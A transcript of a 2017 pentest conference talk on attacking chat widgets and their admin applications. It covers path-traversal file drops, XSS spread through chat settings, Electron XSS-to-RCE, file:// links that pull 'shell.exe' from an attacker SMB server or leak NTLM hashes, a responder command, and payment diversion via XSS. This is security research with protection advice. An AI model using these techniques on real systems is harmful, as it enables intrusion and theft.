Chat with a hacker

E K
November 21, 2017


A talk about 3rd-party applications: how can they help us in a pentest?
Topics:
- RCE from file upload
- JavaScript implementation and privileges
- Sad consequence via simple XSS
- Desktop applications (Electron XSS == RCE)
- RCE via scheme file:// and tricks
- A few words about mobile applications, 3rd party SDK and malware


Transcript

Slide 1. Chat with a hacker: Increase attack surface for Pentest. A talk by Egor Karbutov and Alexey Pertsev.

Slide 2. $ Whoarewe
- Egor Karbutov & Alexey Pertsev
- Penetration testers @Digital Security
- Speakers
- Bug Hunters

Slide 3. Agenda
- Chats-Chats-Chats
- How does it work?
- ZIP old tricks
- RCE via ZIP
- So much XSS
- Electron vulnerability
- Scheme file:// for your chats
- Payment through chats
- Mobile Application Chats
Slide 9. Does it help us? Pentest!
- Increase attack surface
- Social engineering attacks
- Vulnerability of own implementations
- Vendor vulnerabilities
- User support is on the local network
- Lack of segmentation (network)

Slide 11. JavaScript «Privileges»
- XML HTTP Request
- Control of user data: Cookie, Tokens, Sensitive information
- HTML replace
- Remote update

Slide 15. Files
- Social engineering attacks?
- Will you send EXE files?
- We can use a couple of stupid tricks with ZIP

Slide 16. 42 Kb ZIP Bomb: 24 Gb? 322 Gb? 132 Tb? 4.5 Pb. Hi @sergeybelove from 2014 :)
Slides 21-26. Let's send a file (one diagram, built up over six slides)
Components: User interface, api.servise.test, storage.servise.test, Operator standalone program.
1. The user sends the file cat.png; on the backend cat.png == id.
2. The operator's standalone program receives a File Message with file_path = "/file/id".
3. The program builds the download URL: Concat('https://storage.service.test', file_path);
4. Download file: GET /file/id HTTP/1.1, Host: storage.service.test
5. The file is saved as %Downloads%/cat.png
Slides 29-35. RCE via File (the same diagram with attacker-controlled values, built up over seven slides)
Components: User interface, api.servise.test, storage.servise.test.hacke.site, Operator standalone program.
1. The user sends the file cat.png, but the File Message carries file_path = ".hacker.site/file/id" (shown as ".hacker.test/file/id" on the API side).
2. The operator's standalone program builds the URL as before: Concat('https://storage.service.test', file_path);
3. The concatenated host is now storage.service.test.hacke.site, a host the attacker controls.
4. The file name is also attacker-chosen: ../../../../../../../shell.exe == id
5. Download file: GET /file/id HTTP/1.1, Host: storage.service.test.hacke.site
6. The file is saved as %Downloads%/shell.exe
Slide 36. XSS
- XSS is the maximum impact
- High level of message security
- Not obvious places: Headers, GET/POST parameters for analytics
- Our target is the Admin page or the statistic page

Slide 38. Parameters for XSS
- Methods: GET, POST, WebSocket
- Keep it simple. Use gray box analysis!

Slide 39. Admin & Statistic Page
- Waiting for someone to visit this page
- Abuse of complaints against administrators

Slide 40. The sad consequences
- XSS into chat settings
- Appearance customisation: Fonts, Labels, Color, Image, etc.
Slides 43-48. Attack scheme №1: XSS attack on chat (one diagram, built up over six slides)
Actors: pentest_client.shop.test, Evil Hacker, statistic_vendor.chat.test, admin_vendor.chat.test.
1. XSS attack on client admins
2. JS code injection into chat settings
3. XSS from any user on the site (pentest_client.shop.test)

Slides 51-57. Attack scheme №2: XSS attack on chat (one diagram, built up over seven slides)
Actors: Evil Hacker, chat.vendor, statistic.chat.vendor, admin.chat.vendor.
1. XSS attack on vendor admins
2. JS code injection into chat settings
3. XSS from any user on the site (chat.vendor)
4. XSS from any user on chat clients: statistic_vendor.chat.test, admin_vendor.chat.test, chat.test, all chat clients' services
Slide 58. Electron
- Open-source framework to build desktop apps using HTML, CSS and JavaScript
- Electron accomplishes this by combining Chromium and Node.js into a single runtime
- Chat vendors use Electron for admin desktop applications

Slide 59. Electron Threat Model
- Electron Threat Model = Browser Threat Model
- Untrusted content from the web
- SOP bypass
- Control whether access to Node.js primitives is allowed from JavaScript
- Potential access to Node.js primitives
- Limited sandbox
- XSS == RCE
- https://doyensec.com/resources/us-17-Carettoni-Electronegativity-A-Study-Of-Electron-Security.pdf
- https://blog.doyensec.com/2017/08/03/electron-framework-security.html

Slide 61. Electron sandbox bypass
- nodeIntegration = true
- Misconfiguration
- SOP bypass via presence of privileged URLs
- Switch it to false
Slide 62. File://
- Typically used to retrieve files from networks and local disks
- Vulnerability in the wild: Local File Inclusion, XXE, SSRF
- Windows context: NTLM Hash Stealing, NTLM Relay, RCE

Slide 63. Chats with File://
- Admin desktop application for Windows
- Available scheme file://
- Scheme file:// rendered like a hyperlink

Slide 64. Chats with File:// (diagram)
- The Hacker sends a file:// link (file://hacker.test/) to the admin desktop application at pentest_client.shop.test
- The admin application sends the NTLM hash to the Hacker SMB server
- Hash cracking / SMB relay
- Pentest in local network
- RCE on client device and servers
- Weak & duplicate passwords (local services, servers, client devices)

Slide 65. Tricks with File:// №1
- What can we do? File:// with local files: file://C:/Windows/System32/calc.exe
- But we can't use arguments: file://C:/Windows/System32/cmd.exe /C calc
- All symbols in a file link are part of the path
- It is only for social engineering attacks
- You can combine this with the dir traversal ZIP trick

Slide 66. Tricks with File:// №2
- File:// with executable files from the Internet (Hacker SMB server): file://internet_IP/pwn.exe

Slide 67. Chats with File:// (diagram)
- The Hacker sends a file:// link to an executable file: file://hacker.test/shell.exe
- Clicking on the link, the Admin OS downloads shell.exe from the Hacker SMB server and executes shell.exe
- Pentest internet service and local network
- RCE on client device
- Social engineering attacks + file://local_files

Slide 68. Tricks with File:// №3
- How to bypass the Windows alert window? "This file is in a location outside your local network"
- Easy, I'll use local addresses: 10.0.0.0 to 10.255.255.255, 172.16.0.0 to 172.31.255.255, 192.168.0.0 to 192.168.255.255
- No, it doesn't work

Slide 69. Tricks with File:// №3
- "Local network" for Windows means servers with a NetBios name
- NetBios name: a domain name without a dot
- If I use the NetBios name "netbios" instead of a "local IP", I can bypass that alert: file://netbios/pwn.exe
- How? Smbd (samba) server + responder -d netbios -I eth0
- Works only in local networks

Slide 70. Chats with File:// (diagram)
- NetBios name trick in local network, without alert window
- The Hacker sends a file:// link to an executable file: file://netbios/pwn.exe
- Clicking on the link, the Admin OS downloads shell.exe from the Hacker SMB server and executes shell.exe
Slides 73-77. Hacker can buy an IPhone for free (one diagram, built up over five slides)
- POST /pay?params=1 to the Shop backend, with parameters shopId, customer, sum, item, ...
- Redirect to payment page
- checkURL: YES
- Evil Hacker
- avisoURL: IPhone X

Slide 78. Stealing money for hackers
POST /pay?params=1 with shopId, customer, sum, item, ...
Steps to take profit:
- Register your own shop with a similar name
- Change shopId via XSS
- Call checkURL and avisoURL as needed
- All payments go to the hackers!
Protection:
- Check Yandex IPs
- Add an anti-CSRF token to the config form
- DO NOT SHOW ANY PASSWORDS EVER
Slide 79. Mobile Application SDK
- Custom code for native applications
- All code runs with the same privileges in the mobile OS
- 3rd-party applications have full access in your app: change the user interface, access local files in the app folder, access dynamic user data, change app logic (like tapjacking)
- Vulnerability: custom implementation, WebView JS manipulation (Android)
- https://labs.mwrinfosecurity.com/blog/webview-addjavascriptinterface-remote-code-execution/

Slide 80. ExpensiveWall
- ExpensiveWall is spread to different apps as an SDK called "gtk"
- ExpensiveWall sends data about the infected device to its C&C server, including its location and unique identifiers, such as MAC and IP addresses, IMSI, and IMEI
- Total downloads of infected applications = 5,904,511
- https://blog.checkpoint.com/2017/09/14/expensivewall-dangerous-packed-malware-google-play-will-hit-wallet/

Slide 81. Don't forget about
- Farms that overestimate the rating of applications
- Dynamic code execution and code update: JSPatch (iOS), Android Runtime
- Valid Ads that were vulnerable
- Applications with a fake (Ad) SDK
- Code review of custom SDK code

Slide 82. Conclusion
- For pentest and red team: increase your attack surface via 3rd-party services and program libraries
- For you and your project: think about how much you trust other people's implementations, the applications on your devices and the plugins in your programs
- Don't forget about code review!
- All vulnerabilities were reported and fixed